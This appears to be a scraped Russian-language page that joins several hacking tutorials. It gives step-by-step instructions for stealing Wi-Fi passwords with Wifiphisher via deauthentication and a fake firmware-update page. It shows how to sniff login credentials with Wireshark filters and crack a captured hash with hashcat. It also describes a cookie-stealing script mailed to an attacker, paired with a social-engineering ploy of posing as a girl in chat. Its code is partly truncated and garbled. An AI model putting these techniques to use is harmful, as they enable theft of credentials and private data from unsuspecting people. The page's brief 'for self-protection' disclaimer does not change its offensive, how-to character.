Игорь найдьонов. Лучшие программы для взлома паролей Сниффинг данных в других программах

Но некоторые читатели жалуются, что на взлом WPA2 уходит слишком много времени, а защита WPS включена далеко не на всех точках доступа (на мой взгляд, точек с WPS всё ещё достаточно много). Чтобы помочь вам в таких ситуациях, я расскажу о практически гарантированном способе получения пароля от Wi-Fi без всякого взлома с помощью

Скрыто от гостей

.

Этапы стратегии Wifiphisher

Идея заключается в создании , а затем деаутентификации пользователя с его оригинальной точки (для этого подойдёт и DoS-атака). После повторного подключения, он попадёт на вашу поддельную точку доступа с тем же SSID и увидит кажущуюся настоящей веб-страницу запрашивающую пароль из-за «обновления прошивки». Как только пароль будет введён, вы перехватите его и позволите ему использовать злого близнеца, как настоящую точку доступа, чтобы он ничего не заподозрил. Отличный план!

Таким образом, Wifiphisher выполняет следующие действия:

  • Выкидывает пользователя с настоящей точки доступа.
  • Позволяет ему войти на вашу поддельную точку доступа.
  • Демонстрирует пользователю веб-страницу, уведомляющую об успешном «обновлении прошивки» и необходимости повторного ввода учётных данных.
  • Передаёт хакеру пароль от Wi-Fi, в то время как ничего не подозревающий пользователь продолжает спокойно пользоваться интернетом.
  • Подобные скрипты не являются чем-то новым, взять хотя бы Airsnarf. Но Wifiphisher выгодно отличается от них своей продвинутостью. Этот автоматический скрипт значительно упрощает вашу работу, однако, при желании, вы всегда можете выполнить вышеописанные шаги и вручную

    Для достижения поставленной цели вам понадобиться и два , один из которых способен выполнять инъекцию пакетов. В данном случае, я воспользовался моделью . Вы можете выбрать и другие адаптеры, но прежде чем сделать это, убедитесь, что они совместимы с (поддерживают инъекцию пакетов). Пожалуйста, не жалуйтесь, что у вас ничего не работает, пока не проверите свой беспроводной адаптер и не убедитесь, что он способен совершать инъекцию пакетов. У большинства моделей такая возможность отсутствует.

    Ну а теперь, давайте взглянем на Wifiphisher.

    Шаг 1: Скачайте Wifiphisher

    Для начала, запустите Kali и откройте терминал. Затем скачайте Wifiphisher с

    Скрыто от гостей

    И распакуйте код.

    Kali > tar -xvzf /root/wifiphisher-1.1.tar.gz

    На скриншоте ниже видно, что я распаковал исходный код Wifiphisher.

    Кроме этого, вы можете скопировать код с GitHub, выполнив следующую команду:

    Kali > git clone https://github/sophron/wifiphisher

    Шаг 2: Откройте директорию утилиты

    Kali > cd wifiphisher-.1.1

    Просматривая содержимое этой директории, вы увидите там скрипт wifiphisher.py.

    Kali > ls -l

    Шаг 3: Запустите скрипт

    Вы можете запустить скрипт Wifiphisher, воспользовавшись этой командой:

    Kali > python wifiphisher.py

    Обратите внимание, что перед названием скрипта я поставил имя интерпретатора – python.

    Во время первого запуска, скрипт, скорее всего, сообщит вам, что «hostapd» не найден и предложит его установить. Чтобы начать установку hostapd, введите «y» (да).

    После завершения установки, снова выполните скрипт Wifiphisher.

    Kali > python wifiphisher.py

    На этот раз он запустит веб-сервер на порте 8080 и 443, а затем найдёт все доступные сети Wi-Fi.

    После этого вы увидите список всех обнаруженных Wi-Fi сетей на экране. В моём примере утилите удалось найти сеть под названием «wonderhowto». Она и станет целью нашей атаки.

    Шаг 4: Начните атаку и получите пароль

    Нажмите Ctrl + C на своей клавиатуре, и приложение попросит вас ввести номер точки доступа, которую вы хотите атаковать. В моём случае это точка номер 12.

    После нажатия клавиши Enter, Wifiphisher покажет вам страничку, которую вы можете видеть на скриншоте ниже. Это значит, что интерфейс сейчас используется и происходит клонирование SSID и атака выбранной точки доступа.

    Пользователь будет отключён от своей точки доступа. Во время повторного подключения он будет направлен на нашу .

    Как только это произойдёт, прокси на веб-сервере перехватит запрос и подсунет пользователю поддельную страничку входа, информирующую об установке новой версии прошивки маршрутизатора и необходимости повторной аутентификации.

    Как видите, я ввёл свой пароль (nullbyte) и нажал Отправить.

    Когда пользователь введёт своё пароль, он будет передан вам через открытый терминал Wifiphisher. Затем утилита пропустит пользователя в интернет через вашу систему, дабы он ничего не заподозрил.

    Теперь вы сможете получить даже самый сложный пароль от Wi-Fi ! Не забывайте иногда возвращаться к нам за новыми интересными статьями, посвящёнными различным методикам взлома!

    Материал создан не для взлома и захвата личных данных. А с целью дать понять схему и принцип защиты простому пользователю его данных. Если знать схему из нутри то и понять как защитить себя в кафе или других общественных местах, подключившись к любой доступной сети. Скажем как пример WiFi в кафе, возможно все ниже описываемое стоит как уже входящее в штат программ этого кафе. Все это реально, если не убедит статья, попробуйте сделать сами. Если не чего не поймете можете обратиться с просьбой помочь в самом низу статьи в комментарий.

  • Возьмем один из много численных примеров: Google просит всех Администраторов сайтов, переходить с HTTP на HTTPS тем самым создавая зашифрованные соединения, между клиентом и сервером(Между вами и сайтом). Переходить на HTTPS хостеры(Администраторы сайтов) не торопятся, многие клиенты используют все еще операционную систему Windows XP, которая не поддерживает этот протокол HTTPS а работает на старом HTTP. Тем самым клиенту использующему Windows XP будет попросту не зайти на такой сайт с зашифрованном соединении HTTPS. Одна из причин почему хостеры не используют протокол HTTPS. Ниже идет более подробное описание:
  • Очень часто они(ваши данные) передаются по сети не в защищенном виде. Поэтому если сайт, на котором вы пытаетесь авторизоваться, использует HTTP протокол, то очень просто выполнить захват этого трафика, проанализировать его с помощью Wireshark и далее с помощью специальных фильтров и программ найти и расшифровать пароль. Но не отчаивайтесь, чтобы ваши пароли перехватить надо подключится к вашей сети. WiFi например надо с начало узнать пароль а уже потом и другие пароли на ваши ресурсы. Почему в данное время много говорят о том что не стоит подключаться к WiFi в кафе или в других не знакомых местах. Потому что ваш трафик пойдет по этой сети, а дальше, что дальше, читайте дальше.
  • Лучшее место для перехвата паролей – ядро сети, где ходит трафик всех пользователей к закрытым ресурсам (например, почта) или перед маршрутизатором для выхода в Интернет, при регистрациях на внешних ресурсах. Настраиваем зеркало и мы готовы почувствовать себя хакером.
  • Теперь все по порядку:Шаг 1. Устанавливаем и запускаем Wireshark для захвата трафика
  • Иногда для этого достаточно выбрать только интерфейс, через который мы планируем захват трафика, и нажать кнопку Start. В нашем случае делаем захват по беспроводной сети.
  • Захват трафика начался.
  • Шаг 2. Фильтрация захваченного POST трафика
  • Открываем браузер и пытаемся авторизоваться на каком-либо ресурсе с помощью логина и пароля. По завершению процесса авторизации и открытия сайта мы останавливаем захват трафика в Wireshark. Далее открываем анализатор протоколов и видим большое количество пакетов. Именно на этом этапе большинство ИТ-специалистов сдаются, так как не знают, что делать дальше. Но мы знаем и нас интересуют конкретные пакеты, которые содержат POST данные, которые формируются на нашей локальной машине при заполнении формы на экране и отправляются на удаленные сервер при нажатии кнопки «Вход» или «Авторизация» в браузере.
  • Вводим в окне специальный фильтр для отображения захваченных пакетов: http.request.method == “POST”
  • И видим вместо тысячи пакетов, всего один с искомыми нами данными.
  • Шаг 3. Находим логин и пароль пользователя
  • Быстрый клик правой кнопки мыши и выбираем из меню пункт Follow TCP Steam
  • После этого в новом окне появится текст, который в коде восстанавливает содержимое страницы. Найдем поля «password» и «user», которые соответствуют паролю и имени пользователя. В некоторых случаях оба поля будут легко читаем и даже не зашифрованы, но если мы пытаемся захватить трафик при обращении к очень известным ресурсам типа: Mail.ru, Facebook, Вконтакте и т.д., то пароль будет закодирован:
  • HTTP/1.1 302 Found
  • Date: Mon, 10 Nov 2014 23:52:21 GMT
  • Server: Apache/2.2.15 (CentOS)
  • X-Powered-By: PHP/5.3.3
  • P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
  • Set-Cookie: non=non; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/
  • Set-Cookie: password=e4b7c855be6e3d4307b8d6ba4cd4ab91; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/
  • Set-Cookie: scifuser=networkguru; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/
  • Location: loggedin.php
  • Content-Length: 0
  • Connection: close
  • Content-Type: text/html; charset=UTF-8
  • Таким образом, в нашем случае:
  • Имя пользователя: networkguru
  • Пароль:
  • Шаг 4. Определение типа кодирования для расшифровки пароля
  • Заходим, например, на сайт и вводим наш пароль в окно для идентификации. Выбираете протокол кодирования:
  • Шаг 5. Расшифровка пароля пользователя
  • На данном этапе можем воспользоваться утилитой hashcat:
  • ~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt
  • На выходе мы получили расшифрованным пароль: simplepassword
  • Таким образом, с помощью Wireshark мы можем не только решать проблемы в работе приложений и сервисов, но и также попробовать себя в роли хакера, осуществляя перехват паролей, которые пользователи вводят в веб-формах. Также можно узнавать и пароли к почтовым ящикам пользователей, используя незатейливые фильтры для отображения:
  • Протокол POP и фильтр выглядит следующим образом: pop.request.command == "USER" || pop.request.command == "PASS"
  • Протокол IMAP и фильтр будет: imap.request contains "login"
  • Протокол SMTP и потребуется ввод следующего фильтра: smtp.req.command == "AUTH"
  • Хакерские Cкрипты PHP. JS. PERL.
    Скрипты для кражи паролей
    br>Итак, в этой статье я расскажу, как можно получить пароль и всякую интересную информацию при помощи сайта. Всё что нужно "хацкеру" - это просто иметь в сети свою страничку, на которую вы либо придёте сами, либо вас туда заманят. Скитаясь по сети, я всё чаще и чаще слышу плохие отзывы о социнжинерии. Если вас не интересуют способы взлома с применением социнжинерии или для вас это всё детский лепет, то нажмите в верхнем углу вашего браузера крестик и забудьте о существовании этой статьи. В наше время мало только разбираться в системных кодах и всяких программерских штучках, но ещё надо уметь общаться с народом. Многие хакеры взламывают банки, компьютеры, базы данных не только вычисляя уязвимости в системе безопасности, но и пользуются социнженерией на каждом углу, ведь хакер не только тот, кто взломал систему, но и тот, кто методом общения получает зачастую доступ к самым любопытным местам инета. Достаточно вспомнить так называемого мега хакера Митника, который взломал систему безопасности банка при помощи как раз той самой соцэнжинерии. Сначала я объясню способ взлома простых пользователей, а затем более глобальный взлом, например какой-нить фирмы. Представьте себе, что "хацкер" платит за сеть немалую сумму и начинает подумывать, как бы сделать её бесплатной, или его не пускают без пароля на какой-то рессурс в сети, а у вас есть то, что ему нужно. Первоначально он создаёт себе страничку в сети и на одной из страничек вживляет код примерно вот такой!

    var cook=show_all_cookies();

    document.open("cookies",cook);

    document.write("

    document.close("cookies");

    (скрипт в целях безопасности был немного изменён) Теперь остаётся только заманить на сайт жертву, где вылетит окошко с надписью "Доброго времени суток" после нажатия на кнопку ОК на мыло злоумышленника будут высланы ваши Cookies, в которых содержится много чего интересного - от вашего IP адреса до паролей к службам, которыми вы пользуетесь.

    При простом изучении Cookies можно отрыть довольно много интересной информации. Всё, чем злоумышленник рискует - это то, что он светит своё мыло, но так как сейчас слишком много халявных почтовых ящиков, это не так опасно. Обычно ящик создаётся для проведения атаки, а затем либо сносится или забрасывается и взломщика уже не найти. Хотя можно этот скрипт написать в файле с расширением js и вставить на сайте его при помощи

    Выкладываем свои!

    в этом случает мыло уже не светится. Как же заманить жертву на свой сайт? Да способов до безумия много, например, вы вваливаетесь на чат и выбираете жертву, немного поговорив с жертвой, вы должны добиться её расположения, лучше всего если ваша жертва будет противоположного вам пола. Практика показывает, что лучше всего чтобы вы были представлены в чате девушкой, соответственно выбираете себе ник, который бы вас характиризовал, как девушку (при разговоре смотрите, что пишите. Не выдайте себя окончаниями слов, если вы притворились девушкой, так будьте ей). Каждому понятно, что с девушкой будут говорить все. Помните, что лучше на жертву не давить, а, например, спросить "а у тебя есть фотка? Моя лежит вот по этому адресу http://ваш сайт.ru, сходи если хочешь". Каждому парню будет интересно знать, как выглядит его собеседница, а как только он попадёт на вашу страничку, вы лезьте в потовый ящик и забирайте оттуда его Cookies. Вот и всё, теперь просто надо в них порыться и вы найдёте практически всё, что хотите, таким же способом можно узнавать IP адрес человека, который пользуется прокси серверами, а зная IP, уже можно будет проверить его на расшаренные ресурсы, провести Dos атаку или просто по детски выкинуть из чата. А также можно просто прикалываться при помощи сайта, например, при помощи вот этого скрипта:

    for(I=1 ; I

    Компьютер